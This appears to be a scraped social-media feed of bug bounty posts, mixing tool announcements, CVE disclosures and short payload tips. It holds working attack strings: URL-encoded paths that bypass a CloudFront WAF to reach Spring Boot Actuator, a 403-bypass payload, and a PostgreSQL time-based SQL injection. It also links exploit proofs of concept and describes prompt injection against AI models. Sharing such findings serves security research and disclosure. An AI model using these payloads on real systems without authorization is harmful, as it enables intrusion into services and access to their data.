crdØx.49

Convencido em postar algumas coisas por aqui e estou pensando em postar alguns reports de Bug Bounty aqui…

Claude Bug Bounty Hunter - github.com/shuvonsec/clau… Claude Code skill that turns Claude into your AI bug bounty co-pilot. Point it at any target and Claude maps the attack surface, runs your scanners, validates findings, and writes the HackerOne or Bugcrowd report — all from a single conversation. #bugbounty #bugbountytips #ethicalhacking #claudecode #cybersecurity #hacking #infosec #pentest #hackerone #bugcrowd #opensource

Brilliant, worth checking!! #BugBounty

Claude Bug Bounty Hunter - github.com/shuvonsec/clau… Claude Code skill that turns Claude into your AI bug bounty co-pilot. Point it at any target and Claude maps the attack surface, runs your scanners, validates findings, and writes the HackerOne or Bugcrowd report — all from a single conversation. #bugbounty #bugbountytips #ethicalhacking #claudecode #cybersecurity #hacking #infosec #pentest #hackerone #bugcrowd #opensource

Bypass CloudFront WAF rule blocking access to Spring Boot # All bypasses return real Actuator data: GET /%61ctuator/health → HTTP 200 (5122B) ← 'a' encoded GET /a%63tuator/health → HTTP 200 (5123B) ← 'c' encoded GET /ac%74uator/health → HTTP 200 (5122B) ← 't' encoded GET /act%75ator/health → HTTP 200 (5123B) ← 'u' encoded GET /actu%61tor/health → HTTP 200 (5123B) ← 'a' encoded GET /actua%74or/health → HTTP 200 (5123B) ← 't' encoded GET /actuat%6For/health → HTTP 200 (5123B) ← 'o' encoded GET /actuato%72/health → HTTP 200 (5123B) ← 'r' encoded GET /a%63%74uator/health → HTTP 200 (5123B) ← double encoded GET /%61ctua%74or/health → HTTP 200 (5123B) ← double encoded GET /%61%63%74%75%61%74%6F%72/health → HTTP 200 (5122B) ← fully encoded

Yesterday our team disclosed an RCE (CVE-2026-2749) in Centreon, along with a few other vulnerabilities. Full details are available in our blog post. The issues were responsibly reported to Centreon, which acknowledged them and released fixes for all affected versions. This resulted in three CVEs: CVE-2026-2749, CVE-2026-2751, and CVE-2026-2750. The RCE has a CVSS score of 9.9. Link: hakaisecurity.io/en-deep-lookin…

This is super cool 🤟🏻

Fu-JS 🔎 — a powerful recon tool that crawls JavaScript across subdomains, uncovers hidden endpoints, extracts secrets, builds target-specific wordlists, and recursively expands attack surface from JS files. Perfect for bug bounty hunters focused on client-side recon & endpoint discovery. Source: github.com/th3hack3rwiz/F… #BugBounty #Recon #AppSec #WebSecurity #JavaScript

🔥CSP bypass. Use the following site to find payload. cspbypass.com

A pesquisa no Node-RED 4.0.9 apresenta uma falha crítica no Function Node que permite execução remota de código (RCE). Explorando limitações do módulo vm do Node.js, foi possível burlar a sandbox através da manipulação de construtores JavaScript, acessar o objeto process e carregar o módulo child_process para executar comandos no sistema operacional host. Os testes realizados comprovam a existência de uma vulnerabilidade que burla o isolamento implementado no ambientes possibilitando acesso a dados sensíveis, exigindo controles rigorosos de acesso e isolamento em nível de infraestrutura como mitigação. Confira o arquivo: PT-BR: hakaisecurity.io/pt-br-flow-to-… EN: hakaisecurity.io/flow-to-shell-…

Taxonomy of Prompt Injection Methods Prompt injection (PI), the leading OWASP security risk for generative AI (GenAI) applications, is a type of attack where attacker instructions manipulate models, causing unwanted behavior that results in sensitive data leaks, bypassed safety controls, unauthorized access, or actions. This taxonomy diagram: - Catalogs 185+ named techniques across direct and indirect injection paths and attacker prompting methods - Provides a structured hierarchy showing the full risks of fast-moving GenAI threats - Maps the rapidly evolving landscape of PI techniques Source: assets.crowdstrike.com/is/content/cro…

github.com/momika233/Burp… Welcome to ask questions in the "Questions" section #bugbounty #Burp_Suite #LLM #CyberSecurity #Prompts #Promptshare

this grew a bit more than I expected, so I moved everything into a repo and added @ollama (local) + @GeminiApp backends apart from the existing @OpenAI Codex. same @Burp_Suite mcp setup, just easier to reuse Enjoy it! github.com/six2dez/burp-m… #bugbounty #pentest #burp #hacking

Stop missing attack surface behind Round Robin DNS. 🛑 By default, tools often check just one IP. Force httpx to enumerate ALL resolved A records for every subdomain using -probe-all-ips. Use this Command👇 httpx -l live_hosts.txt -probe-all-ips -silent -o multi_ip_hosts.txt Essential for finding hidden origins and inconsistent WAF protections. #recon #httpx #infosec

403 bypassed ✅ Payload --> ;%09.. #BugBounty #hackerone #idor #sqlinjection #bugbountytip

#opencode RCE CVE-2026-22812 github.com/anomalyco/open…

A automação é o motor das corporações modernas, mas o que acontece quando as chaves dessa automação ficam expostas? :chave: Em nossas recentes análises de ambientes que dependem do protocolo Kerberos, identificamos um ponto crítico de atenção: os arquivos Keytab. Embora essenciais para que serviços se autentiquem sem interação humana, eles funcionam como "senhas substitutas". Se um atacante acessa esses arquivos, ele assume identidades válidas, garantindo persistência e movimento lateral no Active Directory. Para aprofundar esse diagnóstico e oferecer ferramentas de defesa mais robustas, apresentamos o KeyTabExtractor. Este projeto é um fork aprimorado do keytabextract, desenvolvido para extrair e converter hashes de forma eficiente, permitindo que times de segurança validem a exposição de suas credenciais de serviço. O objetivo? Identificar riscos antes que eles se tornem incidentes e elevar o nível de proteção das infraestruturas baseadas em AD. Quer entender como os arquivos Keytab podem ser o elo mais fraco da sua autenticação e como auditá-los? Confira o artigo completo: hakaisecurity.io/en-a-deep-dive…

❗️CVE-2026-21440: A critical path traversal vulnerability affecting the AdonisJS framework, specifically its multipart file upload handling. PoC Exploit: github.com/Ashwesker/Ashw… ▪️CVSS: 9.2 ▪️CVE Published: January 2nd, 2026 ▪️Exploit Published: January 5th, 2026 Details: AdonisJS is a TypeScript-first web framework. A Path Traversal vulnerability in AdonisJS multipart file handling may allow a remote attacker to write arbitrary files to arbitrary locations on the server filesystem. This impacts @adonisjs/bodyparser through version 10.1.1 and 11.x prerelease versions prior to 11.0.0-next.6. This issue has been patched in @adonisjs/bodyparser versions 10.1.2 and 11.0.0-next.6.

First report of 2026 🥳🥰🌹 Sometimes services behave as if they have authentication, it's just a matter of how it's added. For those in JSON format, definitely try this: "--headers="Content-Type: application/json\nAuthorization: Bearer [TOKEN_HERE]" \" payload ; {"username":"testuser';SELECT PG_SLEEP(5)--"} #bugbounty #bugbountytips #sqlinjection @intigriti

@mugh33ra Nice nice

Reported some Access Control issues today :D #BugBounty #hackerone #idor #sqlinjection #bugbountytip #xss #injection #privateinvitation

Fala, Brasil! 🇧🇷 Essa é a última chamada para convocar seus amigos e colegas de Cyber pro Positive Hack Talks. Ainda dá tempo de garantir um lugar! 👉 phtalks.ptsecurity.com Confiem em mim: o evento vai entregar tudo. Garanto que eu não brinco em serviço quando o assunto é comunidade. Preparei algo de altíssimo nível, feito com muito carinho e sem enrolação. Só vem! ❤️🔥